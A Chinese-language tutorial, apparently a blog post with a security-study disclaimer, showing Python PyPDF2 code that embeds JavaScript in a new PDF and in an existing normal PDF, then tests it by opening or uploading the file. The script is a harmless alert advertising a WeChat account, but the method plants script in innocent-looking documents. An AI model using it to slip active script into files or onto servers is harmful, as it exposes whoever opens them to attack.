注意：本文仅供学习和研究网络安全技术。反对一切危害网络安全的行为。造成法律后果自行负责。

安装

1	pip install PyPDF2

若使用anconda则提前建好环境在执行，安装，防止python 相关模块冲突

1	conda create -n pdf python=3.7

1	activate pdf

使用

生成pdf

利用python创建一个含有XSS的PDF文件。
python 代码如下

from PyPDF2 import PdfReader, PdfWriter
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 添加一个新页面
page = output_pdf.add_blank_page(width=72, height=72)
# 添加js代码
output_pdf.add_js("app.alert('欢迎关注微信公众号 程序员实用技术分享');")
# 将新页面写入到新 PDF 文档中
with open("test_xss.pdf", "wb") as f:
    output_pdf.write(f)

接着，将上诉代码保存为py文件。并运行。
会生成一个test_xss.pdf的文件。

和正常PDF绑定

可以利用Word等工具生成一个常见的PDF文件。利用下面代码进行写入

from PyPDF2 import PdfReader, PdfWriter
# 打开原始 testold.PDF 文件
input_pdf = PdfReader("testold.pdf")
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 将现有的 PDF 页面复制到新文档
for i in range(len(input_pdf.pages)):
    output_pdf.add_page(input_pdf.pages[i])
# 添加 JavaScript 代码
output_pdf.add_js("app.alert('欢迎关注微信公众号 程序员实用技术分享');")
# 将新 PDF 文档写入到文件中
with open("test_xss2.pdf", "wb") as f:
    output_pdf.write(f)

接着，将上诉代码保存为py文件。并运行。
会生成一个test_xss.pdf的文件。

验证

方法1：可以直接使用浏览器大可，则可以弹出相关提示

方法2：将其放到web服务器根目录，或者通过上传的形式上传到服务器。然后访问web服务下的该文件。http://127.0.0.1:8080/test_xss.pdf

一辈子很短，努力的做好两件事就好；
第一件事是热爱生活，好好的去爱身边的人；
第二件事是努力学习，在工作中取得不一样的成绩，实现自己的价值，而不是仅仅为了赚钱；